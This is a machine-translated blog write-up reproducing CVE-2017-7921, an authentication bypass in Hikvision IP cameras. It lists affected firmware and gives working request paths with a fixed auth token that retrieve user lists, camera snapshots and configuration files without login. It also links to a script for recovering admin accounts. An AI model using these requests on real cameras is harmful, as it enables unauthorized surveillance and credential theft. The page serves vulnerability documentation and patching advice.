当前位置:网站首页>Reproduced Xray - cve-2017-7921 (unauthorized access by Hikvision)
Reproduced Xray - cve-2017-7921 (unauthorized access by Hikvision)
2022-07-01 09:01:00 【xiaochuhe.】
One 、 Vulnerability description
many Hikvision IP The camera contains a back door , Allow unauthenticated impersonation of any configured user account . At least from 2014 From the year onwards , This loophole exists in Hikvision's products . except hikvision Brand of equipment , It also affected many white label camera products sold under various brand names . Thousands of vulnerable devices are still exposed to the Internet at the time of release . In addition to obtaining full administrative access , The vulnerability can also be used to retrieve the plaintext password of all configured users .
Two 、 Affects version
HikvisionDS-2CD2xx2F-ISeries5.2.0build140721
Version to 5.4.0build160530 edition ;
DS-2CD2xx0F-ISeries5.2.0build140721
Version to 5.4.0Build160401 edition ;
DS-2CD2xx2FWDSeries5.3.1build150410
Version to 5.4.4Build161125 edition ;
DS-2CD4x2xFWDSeries5.2.0build140721
Version to 5.4.0Build160414 edition ;
DS-2CD4xx5Series5.2.0build140721
Version to 5.4.0Build160421 edition ;
DS-2DFxSeries5.2.0build140805
Version to 5.4.5Build160928 edition ;
DS-2CD63xxSeries5.0.9build140305
Version to 5.3.5Build160106 edition
3、 ... and 、xray Scan results
Four 、 Loophole recurrence
( One ) Not authorized to retrieve a list of all users and their roles
IP/Security/users?auth=YWRtaW46MTEK
Retrieve all users 
( Two ) Take a camera snapshot without authorization
IP/onvif-http/snapshot?auth=YWRtaW46MTEK
Take a shot without authentication 
( 3、 ... and ) Download camera configuration without authorization
IP/System/configurationFile?auth=YWRtaW46MTEK
Download the camera binary configuration file 
( Four ) The most critical step is to obtain the background account
CVE-2017-7921 Loophole recurrence poc- Network security document resources -CSDN download
Use the script to obtain the background account
Successfully logged in !
It's a success !
5、 ... and 、 Repair suggestions
At present, the manufacturer has released an upgrade patch to fix this security problem , Patch get link :
http://www.hikvision.com/us/about_10805.html
边栏推荐
- Redis——Lettuce连接redis集群
- Graduation season, I want to tell you
- Win7 pyinstaller reports an error DLL load failed while importing after packaging exe_ Socket: parameter error
- Installing Oracle EE
- Flink interview questions
- Shell script - positional parameters (command line parameters)
- Meituan machine test in 2022
- 记一次redis超时
- I would like to know the process of stock registration and account opening by mobile phone? In addition, is it safe to open a mobile account?
- Mysql8.0 learning record 17 -create table
猜你喜欢
Only in China! Alicloud container service enters the Forrester leader quadrant
Foundation: 2 The essence of image
Nacos - service discovery
Phishing identification app
【MFC开发(16)】树形控件Tree Control
Nacos - gestion de la configuration
MySQL optimization
如何做好固定资产管理?易点易动提供智能化方案
Ranking list of domestic databases in February, 2022: oceanbase regained the "three consecutive increases", and gaussdb is expected to achieve the largest increase this month
Nacos - 配置管理
随机推荐
Performance improvement 2-3 times! The second generation Kunlun core server of Baidu AI Cloud was launched
Dynamic proxy
Shell script -select in loop
Log4j 日志框架
Shell脚本-字符串
Understand shallow replication and deep replication through code examples
Jetson Nano 安装TensorFlow GPU及问题解决
记一次redis超时
How to solve the problem of fixed assets management and inventory?
Key points of NFT supervision and overseas policies
Nacos - gestion de la configuration
Nacos - 服务发现
How to effectively align team cognition
Microcomputer principle - bus and its formation
Differences among tasks, threads and processes
猿人学第20题(题目会不定时更新)
中小企业固定资产管理办法哪种好?
The meaning of yolov5 training visualization index
ARM v7的体系结构A、R、M区别,分别应用在什么领域?
Installing Oracle EE